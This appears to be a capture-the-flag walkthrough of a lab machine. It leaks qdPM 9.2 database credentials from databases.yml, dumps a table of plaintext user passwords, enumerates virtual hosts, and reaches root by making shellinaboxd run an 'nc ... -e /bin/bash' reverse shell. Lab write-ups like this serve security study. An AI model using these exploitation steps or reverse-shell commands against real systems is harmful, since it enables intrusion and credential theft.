 ...

Open port 80 in web browser, it shows qdPM v9.2 login panel. Google that it may leak credentials.

# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
 # Date: 03/08/2021
 # Exploit Author: Leon Trappett (thepcn3rd)
 # Vendor Homepage: https://qdpm.net/
 # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
 # Version: 9.2
 # Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

 The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.

Download databases.yml, get login name and password.

```bash
~ wget http://192.168.56.100/core/config/databases.yml
~ cat databases.yml
...
username: qpmadmin
password: "<?php echo urlencode('qpmpazzw') ; ?>"


Login 3306, get a url list.

 ```bash
~ mysql -h 192.168.56.100 -p3306 -u qpmadmin -p
 ...
 +----+-------------------------+
 | id | url                     |
 +----+-------------------------+
 |  1 | http://portal.bah.hmv   |
 |  2 | http://imagine.bah.hmv  |
 |  3 | http://ssh.bah.hmv      |
 |  4 | http://dev.bah.hmv      |
 |  5 | http://party.bah.hmv    |
 |  6 | http://ass.bah.hmv      |
 |  7 | http://here.bah.hmv     |
 |  8 | http://hackme.bah.hmv   |
 |  9 | http://telnet.bah.hmv   |
 | 10 | http://console.bah.hmv  |
 | 11 | http://tmux.bah.hmv     |
 | 12 | http://dark.bah.hmv     |
 | 13 | http://terminal.bah.hmv |
 +----+-------------------------+
 13 rows in set (0.001 sec)

And a users list.

 MariaDB [hidden]> select * from users;
 +----+---------+---------------------+
 | id | user    | password            |
 +----+---------+---------------------+
 |  1 | jwick   | Ihaveafuckingpencil |
 |  2 | rocio   | Ihaveaflower        |
 |  3 | luna    | Ihavealover         |
 |  4 | ellie   | Ihaveapassword      |
 |  5 | camila  | Ihaveacar           |
 |  6 | mia     | IhaveNOTHING        |
 |  7 | noa     | Ihaveflow           |
 |  8 | nova    | Ihavevodka          |
 |  9 | violeta | Ihaveroot           |
 +----+---------+---------------------+
 9 rows in set (0.001 sec)

Make a dic with the url and enum vhost. All urls are OK, but party.bah.hmv returns the minimum size.

 ~ gobuster vhost -u bah.hmv  -w  dic                                                                    
 ===============================================================
 2021/08/22 10:38:10 Starting gobuster in VHOST enumeration mode
 ===============================================================
 Found: party.bah.hmv (Status: 200) [Size: 5216]
 Found: imagine.bah.hmv (Status: 200) [Size: 5659]
 Found: portal.bah.hmv (Status: 200) [Size: 5657]
 Found: hackme.bah.hmv (Status: 200) [Size: 5657]
 Found: telnet.bah.hmv (Status: 200) [Size: 5657]
 Found: dev.bah.hmv (Status: 200) [Size: 5651]    
 Found: ssh.bah.hmv (Status: 200) [Size: 5651]    
 Found: here.bah.hmv (Status: 200) [Size: 5653]  
 Found: ass.bah.hmv (Status: 200) [Size: 5651]    
 Found: console.bah.hmv (Status: 200) [Size: 5659]
 Found: tmux.bah.hmv (Status: 200) [Size: 5653]  
 Found: dark.bah.hmv (Status: 200) [Size: 5653]  
 Found: terminal.bah.hmv (Status: 200) [Size: 5661]

Add party.bah.hmv into /etc/hosts, and visit port 80 again, we get a shell interface. Login with the credentials from yml file.

image-20210822104716708.png

This web shell is OK, so we don't need to spawn a reverse shell.

In /home, found another user rocio, escalate to user rocio with password we get from database.

 qpmadmin@bah:/home/rocio$ su rocio
 Password:
 rocio@bah:~$ id
 uid=1000(rocio) gid=1000(rocio) groups=1000(rocio),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Check pspy. Notice an interesting command of shellinaboxd.

 2021/08/21 23:38:00 CMD: UID=107  PID=452    | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Bl
 ack on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disa
 ble-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev

From the github help of shellinabox, we can know /devel:root:root:/:/tmp/dev means if we visit http://xxxx/devel, we will run /tmp/dev as root.

So we create shell code in /tmp/dev.

 ~ echo 'nc 192.168.56.150 1234 -e /bin/bash' >/tmp/dev
 ~ chmod +x /tmp/dev

When we visit http://party.bah.hmv/devel/ from web browser, we will get reverse shell.

 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59154.
 id
 uid=0(root) gid=0(root) groups=0(root)